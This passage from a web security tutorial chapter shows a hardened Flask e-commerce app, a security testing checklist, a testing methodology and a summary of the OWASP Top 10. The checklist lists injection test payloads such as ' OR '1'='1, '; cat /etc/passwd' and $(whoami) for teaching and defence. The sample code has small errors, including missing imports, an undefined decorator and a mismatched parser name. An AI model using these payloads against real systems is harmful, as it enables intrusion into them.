from flask_limiter import Limiter
from flask_talisman import Talisman
from markupsafe import escape
import bleach
import sqlite3
import hashlib
import hmac
import secrets
import re
import logging
from datetime import datetime, timedelta
from argon2 import PasswordHasher
import defusedxml.ElementTree as ET
import json

app = Flask(__name__)

# Security Configuration
app.config.update(
    SECRET_KEY=os.environ.get('SECRET_KEY'),  # From environment, not hardcoded
    SESSION_COOKIE_SECURE=True,
    SESSION_COOKIE_HTTPONLY=True,
    SESSION_COOKIE_SAMESITE='Lax',
    PERMANENT_SESSION_LIFETIME=timedelta(minutes=30),
    MAX_CONTENT_LENGTH=16 * 1024 * 1024  # 16MB max upload
)

# Security Extensions
Talisman(app, force_https=True)
limiter = Limiter(app, key_func=lambda: session.get('user_id') or request.remote_addr)

# Database with connection pooling
def get_db():
    if not hasattr(g, 'db'):
        g.db = sqlite3.connect('ecommerce.db', timeout=20)
        g.db.row_factory = sqlite3.Row
    return g.db

@app.teardown_appcontext
def close_db(error):
    if hasattr(g, 'db'):
        g.db.close()

# Password hashing
ph = PasswordHasher(time_cost=3, memory_cost=65536, parallelism=1)

# Security Logging
security_logger = logging.getLogger('security')
security_logger.setLevel(logging.INFO)

# Secure Search (SQL Injection Prevention)
@app.route('/search')
@limiter.limit("30 per minute")
def search_products():
    query = request.args.get('q', '')
    
    # Input validation
    if not query or len(query) > 100:
        return "Invalid search query", 400
    
    # Sanitize: Remove special characters, allow alphanumeric and spaces
    safe_query = re.sub(r'[^\w\s]', '', query)
    
    db = get_db()
    # Parameterized query prevents SQL injection
    cursor = db.execute(
        "SELECT id, name, price FROM products WHERE name LIKE ? LIMIT 50",
        (f'%{safe_query}%',)
    )
    products = cursor.fetchall()
    
    # Log search for security monitoring
    security_logger.info(f"Search performed", extra={
        "query": safe_query,
        "results_count": len(products),
        "user_id": session.get('user_id', 'anonymous')
    })
    
    return {
        "products": [
            {"id": p["id"], "name": p["name"], "price": p["price"]} 
            for p in products
        ]
    }

# Secure Authentication
@app.route('/login', methods=['POST'])
@limiter.limit("5 per minute")  # Brute force protection
def login_secure():
    username = request.form.get('username')
    password = request.form.get('password')
    
    if not username or not password:
        return "Invalid credentials", 401  # Generic message
    
    db = get_db()
    cursor = db.execute(
        "SELECT id, username, password_hash, role FROM users WHERE username = ?",
        (username,)
    )
    user = cursor.fetchone()
    
    # Constant-time comparison to prevent timing attacks
    if user:
        try:
            ph.verify(user["password_hash"], password)
            
            # Regenerate session ID (prevent fixation)
            session.regenerate() if hasattr(session, 'regenerate') else None
            session.clear()
            
            session['user_id'] = user["id"]
            session['username'] = user["username"]
            session['role'] = user["role"]
            session['auth_time'] = datetime.utcnow().isoformat()
            
            security_logger.info("Successful login", extra={
                "user_id": user["id"],
                "username": username,
                "ip": request.remote_addr
            })
            
            return {"status": "success", "role": user["role"]}
            
        except Exception:
            pass  # Fall through to generic error
    
    # Log failed attempt
    security_logger.warning("Failed login attempt", extra={
        "username": username,
        "ip": request.remote_addr,
        "user_agent": request.headers.get('User-Agent')
    })
    
    # Generic error (don't reveal if username exists)
    return "Invalid credentials", 401

# Secure Access Control
@app.route('/api/user/<int:user_id>')
@require_ownership_or_admin('user_id')
def get_user_secure(user_id):
    db = get_db()
    cursor = db.execute(
        "SELECT id, username, email, created_at FROM users WHERE id = ?",
        (user_id,)
    )
    user = cursor.fetchone()
    
    if not user:
        return "User not found", 404
    
    return {
        "id": user["id"],
        "username": user["username"],
        "email": user["email"],
        "created_at": user["created_at"]
    }

# Secure Input Handling (XSS Prevention)
@app.route('/profile', methods=['GET', 'POST'])
def profile_secure():
    if 'user_id' not in session:
        return "Authentication required", 401
    
    db = get_db()
    
    if request.method == 'POST':
        bio = request.form.get('bio', '')
        
        # Validation: Length limit
        if len(bio) > 500:
            return "Bio too long", 400
        
        # Sanitization: Allow only specific HTML tags
        allowed_tags = ['b', 'i', 'em', 'strong', 'a']
        allowed_attrs = {'a': ['href', 'title']}
        clean_bio = bleach.clean(bio, tags=allowed_tags, attributes=allowed_attrs)
        
        # Update database
        db.execute(
            "UPDATE users SET bio = ? WHERE id = ?",
            (clean_bio, session['user_id'])
        )
        db.commit()
        
        security_logger.info("Profile updated", extra={
            "user_id": session['user_id']
        })
    
    # Retrieve and display
    cursor = db.execute(
        "SELECT bio FROM users WHERE id = ?",
        (session['user_id'],)
    )
    result = cursor.fetchone()
    bio = result["bio"] if result else ""
    
    # SECURE: Use template auto-escaping or explicit escaping
    # Never use f-strings or + concatenation with user data in HTML
    return render_template_string("""
        <form method="POST">
            <textarea name="bio" maxlength="500">{{ bio }}</textarea>
            <button>Save</button>
        </form>
        <div>Current Bio: {{ bio }}</div>
    """, bio=bio)  # Jinja2 auto-escapes by default

# Secure XML Processing
@app.route('/import', methods=['POST'])
def import_secure():
    xml_data = request.data
    
    # Validation: Check size
    if len(xml_data) > 1024 * 1024:  # 1MB limit
        return "File too large", 400
    
    try:
        # SECURE: Use defusedxml
        root = DefusedET.fromstring(xml_data)
        
        # Process only expected elements
        for product in root.findall('product'):
            name = product.get('name')
            price = product.get('price')
            
            # Validate data types
            if not name or not isinstance(name, str):
                continue
            try:
                price = float(price)
            except (TypeError, ValueError):
                continue
            
            # Insert into database
            db = get_db()
            db.execute(
                "INSERT INTO products (name, price) VALUES (?, ?)",
                (name, price)
            )
            db.commit()
        
        security_logger.info("XML import completed", extra={
            "products_imported": len(root.findall('product')),
            "user_id": session.get('user_id')
        })
        
        return "Import successful", 200
        
    except DefusedET.ParseError as e:
        security_logger.warning("XML parse error", extra={"error": str(e)})
        return "Invalid XML format", 400

# Security Headers and Configuration
@app.after_request
def set_security_headers(response):
    """
    Set comprehensive security headers
    """
    # Prevent MIME type sniffing
    response.headers['X-Content-Type-Options'] = 'nosniff'
    
    # XSS Protection (legacy browsers)
    response.headers['X-XSS-Protection'] = '1; mode=block'
    
    # Clickjacking protection
    response.headers['X-Frame-Options'] = 'DENY'
    
    # Strict Transport Security (HSTS)
    response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains; preload'
    
    # Content Security Policy
    response.headers['Content-Security-Policy'] = (
        "default-src 'self'; "
        "script-src 'self'; "
        "style-src 'self' 'unsafe-inline'; "
        "img-src 'self' data: https:; "
        "font-src 'self'; "
        "connect-src 'self'; "
        "frame-ancestors 'none'; "
        "base-uri 'self'; "
        "form-action 'self';"
    )
    
    # Referrer Policy
    response.headers['Referrer-Policy'] = 'strict-origin-when-cross-origin'
    
    # Permissions Policy (formerly Feature Policy)
    response.headers['Permissions-Policy'] = (
        'geolocation=(), '
        'microphone=(), '
        'camera=(), '
        'payment=(), '
        'usb=()'
    )
    
    return response

# Error Handling (No information disclosure)
@app.errorhandler(404)
def not_found(error):
    return "Resource not found", 404

@app.errorhandler(500)
def internal_error(error):
    app.logger.error(f"Server Error: {error}", exc_info=True)
    return "An internal error occurred", 500

@app.errorhandler(403)
def forbidden(error):
    return "Access denied", 403
```

---

## **38.12 Security Testing Checklist**

Based on the vulnerabilities covered in this chapter, here is a comprehensive security testing checklist:

```python
# SECURITY TESTING CHECKLIST
# Use this as a guide for manual and automated security testing

SECURITY_TEST_CHECKLIST = {
    "Injection": {
        "SQL_Injection": [
            "Test login forms with ' OR '1'='1 payloads",
            "Test search functions with UNION SELECT payloads",
            "Test URL parameters with boolean-based blind SQLi",
            "Verify parameterized queries are used in code review",
            "Test for time-based blind SQLi with SLEEP/DELAY"
        ],
        "Command_Injection": [
            "Test input fields with ; cat /etc/passwd",
            "Test with $(whoami) and `id` syntax",
            "Test with && and || operators",
            "Verify subprocess calls use list arguments, not shell=True",
            "Test file upload filenames for command injection"
        ],
        "LDAP_Injection": [
            "Test with * (wildcard) in username fields",
            "Test with )(uid=*))(&(uid=* payloads",
            "Verify LDAP queries use parameterized filters",
            "Test directory traversal in LDAP queries"
        ]
    },
    
    "Authentication": {
        "Password_Security": [
            "Verify passwords are hashed with Argon2/bcrypt/scrypt",
            "Check for password complexity requirements",
            "Test for common password rejection",
            "Verify secure password reset flow",
            "Test for credential stuffing protection (rate limiting)"
        ],
        "Session_Management": [
            "Verify session ID regeneration after login",
            "Check session timeout after inactivity",
            "Test for concurrent session handling",
            "Verify secure session cookie flags (HttpOnly, Secure, SameSite)",
            "Test session fixation resistance"
        ],
        "MFA": [
            "Verify MFA is enforced for sensitive operations",
            "Test MFA bypass attempts",
            "Check backup code generation and usage",
            "Verify MFA device management"
        ]
    },
    
    "Access_Control": {
        "Authorization": [
            "Test horizontal access control (IDOR) - access other users' resources",
            "Test vertical access control - escalate privileges",
            "Verify deny by default principle",
            "Test forced browsing to admin URLs",
            "Check indirect object reference implementation"
        ],
        "CORS": [
            "Verify CORS headers are not overly permissive",
            "Test for wildcard (*) in Access-Control-Allow-Origin",
            "Check credentials handling in CORS",
            "Test for null origin acceptance"
        ]
    },
    
    "Cryptography": {
        "Data_Protection": [
            "Verify sensitive data encryption at rest",
            "Check TLS 1.2+ for data in transit",
            "Verify key management (no hardcoded keys)",
            "Check for proper IV usage in encryption",
            "Verify password hashing (not encryption)"
        ],
        "Randomness": [
            "Verify cryptographically secure random number generation",
            "Check token uniqueness and unpredictability",
            "Verify session ID randomness"
        ]
    },
    
    "Input_Validation": {
        "XSS": [
            "Test for reflected XSS in URL parameters",
            "Test for stored XSS in user input fields",
            "Test for DOM-based XSS in client-side code",
            "Verify output encoding in HTML contexts",
            "Check Content Security Policy implementation"
        ],
        "XXE": [
            "Test XML endpoints with external entity payloads",
            "Verify XML parser configuration (external entities disabled)",
            "Check for XInclude attacks",
            "Test for XML bomb (Billion Laughs) protection"
        ],
        "File_Upload": [
            "Test for executable file uploads",
            "Verify file type validation (not just extension)",
            "Check for path traversal in filenames",
            "Verify file size limits",
            "Check for stored XSS via SVG/HTML uploads"
        ]
    },
    
    "Error_Handling": {
        "Information_Disclosure": [
            "Verify generic error messages for users",
            "Check for stack traces in production responses",
            "Verify debug mode is disabled in production",
            "Check for SQL error messages exposed to users",
            "Verify sensitive information not in error logs"
        ]
    },
    
    "Business_Logic": {
        "Workflow": [
            "Test for price manipulation in requests",
            "Check for negative quantity handling",
            "Verify transaction integrity (race conditions)",
            "Test for coupon/referral code abuse",
            "Check for privilege escalation in workflows"
        ]
    }
}

def run_security_test(checklist_item):
    """
    Template for executing security tests
    """
    print(f"Testing: {checklist_item}")
    # Implementation would include:
    # 1. Automated scanner integration (OWASP ZAP, Burp Suite)
    # 2. Manual test case execution
    # 3. Code review verification
    # 4. Report generation
    pass
```

---

## **38.13 Security Testing Methodology**

### **Approach to Security Testing**

Security testing should be integrated throughout the SDLC, not just at the end:

```python
# SECURITY TESTING METHODOLOGY

SECURITY_TESTING_PHASES = {
    "Requirements_Phase": {
        "activities": [
            "Define security requirements (authentication, authorization, encryption)",
            "Identify compliance requirements (GDPR, PCI-DSS, HIPAA)",
            "Define abuse cases (how could attackers misuse this?)",
            "Security risk assessment"
        ],
        "deliverables": [
            "Security requirements document",
            "Threat model (initial)",
            "Compliance checklist"
        ]
    },
    
    "Design_Phase": {
        "activities": [
            "Create threat models (STRIDE methodology)",
            "Design security architecture",
            "Plan authentication and authorization mechanisms",
            "Design secure data flow",
            "Review third-party component security"
        ],
        "deliverables": [
            "Threat model document",
            "Security architecture diagram",
            "Security design patterns selection"
        ]
    },
    
    "Development_Phase": {
        "activities": [
            "Static Application Security Testing (SAST)",
            "Secure code review",
            "Unit testing for security functions",
            "Dependency scanning (SCA)",
            "Secrets scanning (no hardcoded credentials)"
        ],
        "tools": [
            "SonarQube (SAST)",
            "Checkmarx (SAST)",
            "Snyk (SCA)",
            "GitLeaks (Secrets)",
            "Bandit (Python security)"
        ],
        "deliverables": [
            "SAST scan results",
            "Clean secrets scan",
            "Dependency vulnerability report"
        ]
    },
    
    "Testing_Phase": {
        "activities": [
            "Dynamic Application Security Testing (DAST)",
            "Fuzz testing",
            "Penetration testing",
            "API security testing",
            "Mobile security testing (if applicable)"
        ],
        "tools": [
            "OWASP ZAP (DAST)",
            "Burp Suite Professional",
            "Metasploit (Pen testing)",
            "Aqua Security (Containers)",
            "Nuclei (Vulnerability scanner)"
        ],
        "deliverables": [
            "DAST scan report",
            "Penetration test report",
            "Vulnerability assessment"
        ]
    },
    
    "Deployment_Phase": {
        "activities": [
            "Infrastructure security scanning",
            "Container image scanning",
            "SSL/TLS configuration testing",
            "Cloud security posture management",
            "Runtime Application Self-Protection (RASP) deployment"
        ],
        "tools": [
            "Trivy (Container scanning)",
            "ScoutSuite (Cloud security)",
            "Qualys (Vulnerability management)",
            "Datadog Security (Runtime protection)"
        ]
    },
    
    "Operations_Phase": {
        "activities": [
            "Continuous security monitoring",
            "Log analysis and correlation",
            "Threat hunting",
            "Incident response",
            "Security metrics and KPIs"
        ],
        "tools": [
            "SIEM (Splunk, ELK Stack, QRadar)",
            "SOAR (Phantom, Demisto)",
            "Threat intelligence platforms"
        ]
    }
}

# Security Testing Techniques
SECURITY_TEST_TECHNIQUES = {
    "Static_Testing_SAST": {
        "description": "Analyze source code without executing it",
        "when_to_use": "During development, in CI/CD pipeline",
        "pros": ["Finds code-level issues early", "Scales well", "Automated"],
        "cons": ["High false positive rate", "Can't find runtime issues", "Language specific"]
    },
    
    "Dynamic_Testing_DAST": {
        "description": "Test running application from outside",
        "when_to_use": "In testing/staging environments",
        "pros": ["Finds runtime issues", "Technology agnostic", "Tests deployed app"],
        "cons": ["Late in lifecycle", "Limited code coverage visibility", "Can miss logic flaws"]
    },
    
    "Interactive_Testing_IAST": {
        "description": "Agents inside app monitor during DAST/SAST",
        "when_to_use": "Combined with functional testing",
        "pros": ["High accuracy", "Real-time feedback", "Code coverage"],
        "cons": ["Performance overhead", "Language specific", "Complex setup"]
    },
    
    "Manual_Penetration_Testing": {
        "description": "Human expert simulates attacker",
        "when_to_use": "Before major releases, annually",
        "pros": ["Finds complex logic flaws", "Business logic testing", "Creative attacks"],
        "cons": ["Expensive", "Time consuming", "Not scalable for every release"]
    },
    
    "Fuzz_Testing": {
        "description": "Send random/malformed data to inputs",
        "when_to_use": "APIs, file parsers, protocol implementations",
        "pros": ["Finds unexpected crashes", "Automated", "Good for parsers"],
        "cons": ["Many false positives", "Coverage challenges", "Time intensive"]
    }
}
```

---

## **Chapter Summary**

In this comprehensive chapter on **Common Security Vulnerabilities**, we have covered the critical security flaws that affect modern web applications, following the OWASP Top 10 industry standard:

**Key Vulnerabilities and Mitigations:**

1. **Injection Attacks (38.1):** SQL Injection, Command Injection, and LDAP Injection occur when untrusted data is sent to interpreters. **Prevention:** Use parameterized queries, input validation, and least privilege.

2. **Cross-Site Scripting/XSS (38.2):** Stored, Reflected, and DOM-based XSS allow script execution in user browsers. **Prevention:** Output encoding, Content Security Policy, HttpOnly cookies, and input validation.

3. **Cross-Site Request Forgery/CSRF (38.3):** Forces authenticated users to submit unwanted requests. **Prevention:** Anti-CSRF tokens, SameSite cookies, and re-authentication for sensitive actions.

4. **Broken Authentication (38.4):** Weak password policies, poor session management, and missing MFA. **Prevention:** Strong hashing (Argon2), secure session handling, and multi-factor authentication.

5. **Sensitive Data Exposure (38.5):** Inadequate protection of financial, healthcare, or PII data. **Prevention:** Encryption at rest and in transit, proper key management, and data minimization.

6. **XML External Entities/XXE (38.6):** Processing of XML with external entity references. **Prevention:** Disable external entities, use JSON, or secure XML parser configuration.

7. **Broken Access Control (38.7):** Missing or ineffective access control. **Prevention:** Deny by default, least privilege, indirect object references, and comprehensive authorization checks.

8. **Security Misconfiguration (38.8):** Default configurations, verbose errors, and missing patches. **Prevention:** Hardening guides, automated configuration management, and minimal platforms.

9. **Using Components with Known Vulnerabilities (38.9):** Unpatched libraries and frameworks. **Prevention:** Dependency scanning, SBOM, and automated updates.

10. **Insufficient Logging and Monitoring (38.10):** Lack of audit trails and real-time alerting. **Prevention:** Comprehensive security logging, log integrity protection, and automated alerting.

**Security Testing Methodology:**
- **SAST:** Static analysis during development
- **DAST:** Dynamic testing in staging
- **IAST:** Interactive testing with agents
- **Penetration Testing:** Manual expert assessment
- **Continuous Monitoring:** Production security observation

---

## **📖 Next Chapter: Chapter 39 - Security Testing Tools**

Now that you understand the vulnerabilities that threaten applications, Chapter 39 will equip you with the **tools and techniques to detect and prevent these security flaws systematically**.

In **Chapter 39**, you will learn:

- **OWASP ZAP (Zed Attack Proxy):** The industry-standard open-source web application security scanner. You'll learn to set up automated security scanning, configure spidering and active scanning, interpret security alerts, and integrate ZAP into CI/CD pipelines.

- **Burp Suite Professional:** The leading toolkit for manual penetration testing. You'll master the Proxy for request interception, the Repeater for manual request manipulation, the Intruder for automated attacks, and the Scanner for vulnerability detection.

- **SQLMap:** Automated SQL injection and database takeover tool. You'll learn to detect SQL injection vulnerabilities, enumerate databases, and extract data (for authorized testing only).

- **Nmap:** Network discovery and security auditing. You'll learn to discover open ports, identify services, and detect vulnerabilities in network infrastructure.

- **SAST Tools:** SonarQube, Checkmarx, and Semgrep for static code analysis to catch vulnerabilities during development.

- **Dependency Scanning:** Snyk, OWASP Dependency-Check, and GitHub Dependabot for identifying vulnerable components.

- **Secrets Scanning:** GitLeaks, TruffleHog, and GitHub secret scanning to prevent credential leakage.

- **API Security Testing:** REST Assured security extensions, Postman security tests, and specialized API security scanning.

**Chapter 39 will provide hands-on tutorials for each tool, showing you exactly how to configure them, run security scans, interpret results, and remediate findings. You'll build a complete security testing pipeline that can be integrated into your development workflow.**

**Continue to Chapter 39 to master the tools that will help you build secure applications and protect against the vulnerabilities you learned in this chapter!**

<div style='width:100%; display:flex; justify-content:space-between; align-items:center; margin: 1em 0;'>
  <a href='37. security_testing_fundamentals.ipynb' style='font-weight:bold; font-size:1.05em;'>&larr; Previous</a>
  <a href='../TOC.md' style='font-weight:bold; font-size:1.05em; text-align:center;'>Table of Contents</a>
  <a href='39. security_testing_tools.ipynb' style='font-weight:bold; font-size:1.05em;'>Next &rarr;</a>
</div>
